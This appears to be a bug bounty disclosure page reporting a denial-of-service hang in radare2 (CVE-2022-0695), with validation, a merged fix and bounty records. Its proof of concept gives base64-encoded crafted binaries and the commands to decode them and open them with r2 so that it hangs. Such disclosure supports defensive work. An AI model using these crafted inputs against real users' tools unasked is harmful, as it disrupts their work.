Denial of Service in radareorg/radare2

Valid

Reported on

Feb 23rd 2022


Description

R2 will hang for several crafted binaries.

Proof of Concept

printf "%s" "AAA4AAAAAB4=" | base64 -d > /tmp/a
# printf "%s" "z/rt/gwAAAEuAAB//wAAAACe2QEaAAAG+s8yAOH/AQAAAA==" | base64 -d > /tmp/a
# printf "%s" "zvrt/gCd7QBMYWT6AAD6/2NiQGsOAAGbuAAAADQAAID7AAAAAAEAAAEBZWUgcmR4LCByY3gBHQAAABEAAAAB/wAA7wABAAFiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiY2JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi/3///2KdYmJidmJiZc767QIA/38BAAr/7n/WAc767QAAAgD2AB0AABAFAAAVAQAAAAHv7+/v7+/v7+/v729jYWwvc2hhcmUvcmFkYXJlMi9wZGJ4QAAAAAQAAAEBYmVxPwCQHckEAAAAANBEyQR6ABQAkETJBAAAAAAhAAAAAAIAAAAQAAIAAAAQEAAAEgAAAAEAAABlYXhAKysBAA==" | base64 -d > /tmp/a
r2 /tmp/a # This hangs forever.

Impact

This vulnerability is capable of denial of service locally.

Occurrences

This line is never satisfied.

We are processing your report and will contact the radareorg/radare2 team within 24 hours. 3 months ago
lazymio modified the report
3 months ago
lazymio modified the report
3 months ago
pancake validated this vulnerability 3 months ago
lazymio has been awarded the disclosure bounty
The fix bounty is now up for grabs
lazymio
3 months ago

Researcher


@pancake Thanks!

@admin I would like to request a CVE for this disclosure. : )

pancake confirmed that a fix has been merged on 634b88 3 months ago
pancake has been awarded the fix bounty
bin_qnx.c#L75 has been validated
Jamie Slome
3 months ago

Admin


Sorted! CVE-2022-0695

to join this conversation